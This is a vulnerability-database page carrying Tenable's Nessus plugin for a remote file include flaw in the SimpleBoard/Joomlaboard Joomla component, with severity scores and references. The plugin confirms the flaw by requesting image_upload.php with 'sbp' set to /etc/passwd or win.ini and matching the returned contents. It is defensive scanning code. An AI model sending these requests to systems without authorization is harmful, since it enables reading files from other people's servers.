Lucene search

HistoryJul 11, 2006 - 12:00 a.m.

SimpleBoard / Joomlaboard 'sbp' Parameter Remote File Include

2006-07-1100:00:00

www.tenable.com

537

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.3 High

AI Score

Confidence

Low

0.129 Low

EPSS

Percentile

95.5%

JSON

The version of the SimpleBoard or Joomlaboard component for Mambo or Joomla! running on the remote host is affected by a remote file include vulnerability due to improper sanitization of user-supplied input to the ‘sbp’ parameter before using it in the file_upload.php or image_upload.php scripts to include PHP code. Provided the PHP ‘register_globals’ setting is enabled, an unauthenticated, remote attacker can exploit this issue to disclose arbitrary files or execute arbitrary PHP code on the remote host, subject to the privileges of the web server user ID.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(22023);
  script_version("1.35");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/04");

  script_cve_id("CVE-2006-3528", "CVE-2006-5043");
  script_bugtraq_id(18917, 23129);
  script_xref(name:"EDB-ID", value:"1994");
  script_xref(name:"EDB-ID", value:"3560");

  script_name(english:"SimpleBoard / Joomlaboard 'sbp' Parameter Remote File Include");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
remote file include vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of the SimpleBoard or Joomlaboard component for Mambo or
Joomla! running on the remote host is affected by a remote file
include vulnerability due to improper sanitization of user-supplied
input to the 'sbp' parameter before using it in the file_upload.php or
image_upload.php scripts to include PHP code. Provided the PHP
'register_globals' setting is enabled, an unauthenticated, remote
attacker can exploit this issue to disclose arbitrary files or execute
arbitrary PHP code on the remote host, subject to the privileges of
the web server user ID.");
  script_set_attribute(attribute:"see_also", value:"https://forum.joomla.org/viewtopic.php?t=76852");
  script_set_attribute(attribute:"solution", value:
"Disable the PHP 'register_globals' setting or upgrade to Joomlaboard
version 1.1.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_cwe_id(94);

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/07/08");
  script_set_attribute(attribute:"patch_publication_date", value:"2006/07/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/07/11");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("mambo_detect.nasl", "joomla_detect.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

port = get_http_port(default:80,  php:TRUE);
app = "Mambo / Joomla!";

# Generate a list of paths to check.
ndirs = 0;
# - Mambo Open Source.
install = get_kb_item("www/" +port+ "/mambo_mos");
if (install)
{
  matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
  if (!isnull(matches))
  {
    dir = matches[2];
    dirs[ndirs++] = dir;
  }
}
# - Joomla
joomla_installs = get_installs(
  app_name : "Joomla!",
  port     : port
);

if (joomla_installs[0] == IF_OK)
{
  foreach install (joomla_installs[1])
  {
    dir = install['path'];
    dirs[ndirs++] = dir;
  }
}

if (max_index(dirs) == 0)
  audit(AUDIT_WEB_APP_NOT_INST, app, port);

# Try to retrieve a local file.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os)
    files = make_list('/windows/win.ini','/winnt/win.ini');
  else
    files = make_list('/etc/passwd');
}
else files = make_list('/etc/passwd', '/windows/win.ini', '/winnt/win.ini', 'LICENSE.php');

file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['/winnt/win.ini'] = "^\[[a-zA-Z\s]+\]|^; for 16-bit app support";
file_pats['/windows/win.ini'] = "^\[[a-zA-Z\s]+\]|^; for 16-bit app support";
file_pats['LICENSE.php'] = "GNU GENERAL PUBLIC LICENSE";

non_affect = make_list();
vuln = FALSE;

# Loop through each directory.
foreach dir (dirs)
{
  foreach file (files)
  {
    # Try to exploit the flaw to read a file.
    foreach com (make_list("com_simpleboard", "com_joomlaboard"))
    {
      url = dir + "/components/"+com+"/image_upload.php?sbp="+file;
      r = http_send_recv3(
        method : "GET",
        port   : port,
        item   : url,
        exit_on_fail : TRUE
      );
      res = r[2];

      # There's a problem if...
      if (
        egrep(pattern:file_pats[file], string:res) ||
        # we get an error saying "failed to open stream".
        egrep(pattern:"main\("+file+"\\0/sb_helpers\.php.+ failed to open stream", string:res) ||
        # we get an error claiming the file doesn't exist or...
        egrep(pattern:"main\("+file+"\).*: failed to open stream: No such file or directory", string:res) ||
        # we get an error about open_basedir restriction.
        egrep(pattern:"main.+ open_basedir restriction in effect. File", string:res)
      )
      {
        contents = res - strstr(res, "<br");
        vuln = TRUE;
        break;
      }
    }
    if (!thorough_tests) break;
  }
  non_affect = make_list(non_affect, dir);
  if (!thorough_tests) break;
}

if (!vuln)
{
  installs = max_index(non_affect);

  if (installs == 0)
    exit(0, "None of the "+app+ " installs (" + join(dirs, sep:" & ") + ") on port " + port+ " are affected.");

  else if (installs == 1)
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, build_url(qs:dir, port:port));

  else exit(0, "None of the "+app+ " installs (" + join(non_affect, sep:" & ") + ") on port " + port + " are affected.");
}

# Report findings.
security_report_v4(
  port        : port,
  severity    : SECURITY_WARNING,
  file        : file,
  request     : make_list(build_url(qs:url, port:port)),
  output      : contents,
  attach_type : 'text/plain'
);
exit(0);

VendorProductVersionCPE
joomlajoomla%5c%21cpe:/a:joomla:joomla%5c%21

Vendor	Product	Version	CPE
joomla	joomla%5c%21		cpe:/a:joomla:joomla%5c%21

References

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3528

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5043

forum.joomla.org/viewtopic.php?t=76852

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.3 High

AI Score

Confidence

Low

0.129 Low

EPSS

Percentile

95.5%

JSON

Related for SIMPLEBOARD_SBP_FILE_INCLUDES.NASL